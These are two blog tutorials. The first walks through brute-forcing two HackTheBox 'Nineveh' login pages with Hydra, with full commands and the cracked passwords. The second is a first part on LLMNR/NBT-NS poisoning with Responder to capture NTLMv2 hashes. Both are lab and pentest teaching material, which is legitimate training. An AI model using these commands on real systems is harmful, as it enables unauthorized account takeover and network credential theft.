NINEVAH sits on HackTheBox servers at IP address 10.1.10.43. I found a couple login pages at the following URLs. These are the addresses we’re going to attempt to break into.

1st Address: http://10.10.10.43/department/login.php

This image has an empty alt attribute; its file name is image-34.png

2nd Address: https://10.10.10.43/db/index.php

This image has an empty alt attribute; its file name is image-36.png

Using Hydra to Brute-Force Our First Login Page

Hydra is a fairly straight forward tool to use, but we have to first understand what it needs to work correctly. We’ll need to provide the following in order to break in:

Login or Wordlist for Usernames
Password or Wordlist for Passwords
IP address or Hostname
HTTP Method (POST/GET)
Directory/Path to the Login Page
Request Body for Username/Password
A Way to Identify Failed Attempts

Let’s start piecing together all the necessary flags before finalizing our command.

Specifying Username

In our particular case, we know that the username Admin exists, which will be my target currently. This means we’ll want to use the -l flag for Login.
-l admin

Note: If you don’t know the username, you could leverage -L to provide a wordlist and attempt to enumerate usernames. This will only be effective if the website provides a way for you to determine correct usernames, such as saying “Incorrect Username” or “Incorrect Password”, rather than a vague message like “Invalid Credentials”.

Specifying Password

We don’t know the password, so we’ll want to use a wordlist in order to perform a Dictionary Attack. Let’s try using the common rockyou.txt list (by specifying a capital -P) available on Kali in the /usr/share/wordlists/ directory.
-P /usr/share/wordlists/rockyou.txt

IP Address to Attack

This one is easy!
10.10.10.43

Specifying Method

This is where we need to start pulling details about the webpage. Let’s head back into our browser, right-click, and Inspect Element.

A window should pop-up on the bottom of the page. Go ahead and select the Network tab.

Right away, we see a couple GET methods listed here, but let’s see what happens if we attempt a login. Go ahead and type in a random username/password, and click Log In.

Of course our login attempt will fail, but we’re able to see that this website is using a POST method to log-in by looking at the requests.

Easy enough, now we know what method to specify in our command!
http-post-form
Note: You’ll need to enter https if you’re attacking a site on port 443.

Specifying the Path to Attack

So far, we’ve only told the tool to attack the IP address of the target, but we haven’t specified where the login page lives. Let’s prepare that now.
/department/login.php

Finding & Specifying Location of Username/Password Form(s)

This is the hardest part, but it’s actually surprisingly simple. Let’s head back over to our browser window. We should still have the Inspect Element window open on the Network Tab. With our Post request still selected, let’s click Edit and Resend.

Now we see a section called Request Body that contains the username and password you entered earlier! We’ll want to grab this entire request for Hydra to use.

In my case, the unmodified request looks like this:
username=InfiniteLogins&password=Password

Because we know the username we’re after is “admin”, I’m going to hardcode that into the request. I’ll also replace the “Password” I entered with ^PASS^. This will tell Hydra to enter the words from our list in this position of the request. My modified request that I’ll place into my Hydra command looks like this:
username=admin&password=^PASS^

Note: If we desired, we could also brute-force usernames by specifying ^USER^ instead of admin.

Identifying & Specifying Failed Attempts

Finally, we just need a way to let Hydra know whether or not we successfully logged-in. Since we can’t see what the page looks like upon a successful login, we’ll need to specify what the page looks like on a failed login.

Let’s head back to our browser and attempt to login using the username of admin and password of password.

As we saw before, we’re presented with text that reads “Invalid Password!” Let’s copy this, and paste it into our command:
Invalid Password!

Piecing the Command Together

Let’s take all of the components mentioned above, but place them into a single command. Here’s the syntax that we’re going to need.

sudo hydra <Username/List> <Password/List> <IP> <Method> "<Path>:<RequestBody>:<IncorrectVerbiage>"

After filling in the placeholders, here’s our actual command!
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"

Note: I ran into issues later on when trying to execute this copied command out of this WordPress site. You may need to delete and re-enter your quotation marks within the terminal window before the command will work properly for you.

After a few minutes, we uncover the password to sign in!
admin:1q2w3e4r5t

Using Hydra to Brute-Force Our Second Login Page

Go through the exact same steps as above, and you should end up with a command that looks like this.
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"

So what’s different between this command and the one we ran earlier? Let’s make note of the things that changed.

Method was switched to https-post-form
Path was updated to /db/index.php
Request Body is completely different, but we still hard-code admin and replace the password with ^PASS^
Finally, the text returned for a failed attempt reads Incorrect password

After running the command, we uncover the password after just a couple minutes.
admin:password123

Let me know if you found this at all helpful, or if something didn’t quite work for you!

Hacking Tutorial, Pentesting

Abusing LLMNR/NBT-NS in Active Directory Domains: Part 1 (Capturing NTLMv2 Hashes)

Posted on February 11, 2020November 23, 2020 by Harley

Other Parts in Series:

Welcome to Part 1 of this series. As each part gets released, we’ll dive deeper and deeper into the joys of LLMNR poisoning and I’ll demonstrate just how easy it makes the life of an attacker when this default legacy protocol is still running in your environment.

By the end of this series, you will be able to pivot across an ENTIRE poorly configured domain with SYSTEM-level access.

Part 1 Table of Contents:

What is LLMNR & NBT-NS?
Brief Explanation of the Exploit
Downloading and Installing Responder
Capturing NTLMv2 Hashes w/ Responder

What is LLMNR & NBT-NS?

Crowe.com does a fantastic job at giving you a high-level overview of what NetBIOS & link-local multicast name resolution do. Instead of reinventing the wheel, I will simply provide an excerpt from their website below.

“NetBIOS and LLMNR are protocols used to resolve host names and facilitate communication between hosts on local networks. NetBIOS is generally outdated and can be used to communicate with legacy systems. LLMNR is designed for consumer-grade networks in which a domain name system (DNS) server might not exist.”

If none of this sounds familiar, I highly recommend checking out the below link and reading more about these protocols before moving on.

https://www.crowe.com/cybersecurity-watch/netbios-llmnr-giving-away-credentials

Great! So how can I exploit this?

When a computer requests access to a legitimate network resource, it usually follows a set of pre-defined queries. LLMNR and NetBIOS come into play as last resort options when other methods (such as DNS or local hosts files) don’t prove helpful. Since LLMNR & NetBIOS will attempt name resolution via broadcasted requests to the broadcast-domain, we can set up tools to listen for these requests and respond back pretending to be the intended recipient.

Downloading & Installing Responder

Navigate to the following GitHub page and Copy the clone URL.
https://github.com/lgandx/Responder/

Navigate to your /opt folder and Download the tool using git.
cd /opt
sudo git clone https://github.com/lgandx/Responder.git

Poisoning Requests With Responder to Capture NTLMv2 Hashes

Now that we have our tools set up. Let’s take a deeper look at Responder.
cd /opt/Responder ls

We see a handful of files, including Responder.conf (the configuration file) and Responder.py (the script used to perform the exploit). Let’s take a closer look at Responder.conf.
gedit Responder.conf

So there’s a lot going on in here, but I just wanted to make you aware of the section titled Servers to Start. This is where we can configure which servers we’d like Responder to spin up to perform the exploit. We won’t actually make any changes in here just yet, just know that this conf file is very important and will be brought up in the future.

With all servers active, let’s go ahead and Run Responder on our primary interface (note yours may differ depending on your environment).
sudo python Responder.py -I eth0

So what’s happening here? Responder is listening for all incoming requests in the three listed Poisoners (LLMNR, NBT-NS, DNS/MDNS). If any devices on the network need a hand resolving a hostname, fileshare, etc. they will send a broadcast out to the entire network. With this tool running, we will be able to ‘Respond’, pretending to be that destination server. From there, the device will reply back with its NTLMv2 Hash as it attempts to authenticate to the resource.

You’ll get the most responses back on a busy network with many devices in use. I’ve also found that we will get a lot of results during the beginning of shifts or once users return from lunch breaks. If you have enough patience, you should receive a response pretty soon. If you don’t have patience, then let’s see if we can force a LLMNR request..

From a Windows machine on the network, launch a File Explorer window, and attempt to Browse to a fileshare that doesn’t exist.
\\infinitelogins

Within just a few moments, Responder is able to capture my NTLMv2 Hash.

That’s it for this post! Next up, I’ll be showing you what you can do with these hashes to pivot onto other machines or even score a reverse shell. In the mean-time, let me know what you thought of this and whether or not it has been helpful!